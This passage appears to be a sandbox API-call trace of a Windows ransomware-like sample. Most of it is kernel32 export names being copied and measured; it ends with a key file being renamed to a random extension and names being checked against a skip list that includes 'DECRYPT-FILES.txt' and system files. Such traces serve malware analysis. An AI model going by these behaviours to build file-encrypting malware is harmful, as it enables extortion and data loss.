returned="CreateFileTransactedA" [0180.494] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.494] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.494] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.494] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.495] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.495] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.495] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.495] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.495] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.495] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.495] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.495] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.495] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.495] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.495] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.495] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.495] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.495] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.495] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.495] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.495] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.495] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.495] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.495] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.496] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.496] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.496] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.496] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.496] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.496] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.496] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.496] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.496] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.496] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.496] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.496] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.496] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.496] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.496] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.496] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.496] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.496] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.496] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.496] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.497] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.497] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.497] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.497] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.497] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.497] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.497] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.497] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.497] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.497] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.497] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.497] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.497] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.497] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.497] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.497] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.497] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.497] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.497] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.497] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.498] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.498] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.498] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.498] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.498] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.498] lstrlenA (lpString="DELETEATOM") returned 10 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.498] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.498] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.498] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.498] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.498] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.498] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.498] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.498] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.498] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.498] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.498] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.498] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.498] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.499] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.499] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.499] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.499] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.499] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.499] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.499] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.499] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.499] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.499] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.499] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.499] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.499] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.499] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.499] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.499] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.499] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.499] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.499] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.500] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.500] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.500] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.500] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.500] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.500] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.500] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.500] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.500] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.500] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ") returned 188 [0180.500] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ.KUbgZCi") returned 196 [0180.500] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.h3nj"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ.KUbgZCi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.h3nj.kubgzci"), dwFlags=0x0) returned 1 [0180.501] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.501] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.502] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.502] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaa5af3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0x0, dwReserved1=0x0, cFileName="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", cAlternateFileName="932A2D~1.3XS")) returned 1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="DECRYPT-FILES.txt") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="autorun.inf") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="boot.ini") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="desktop.ini") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="ntuser.dat") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="iconcache.db") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="bootsect.bak") returned -1 [0180.502] lstrcmpiW 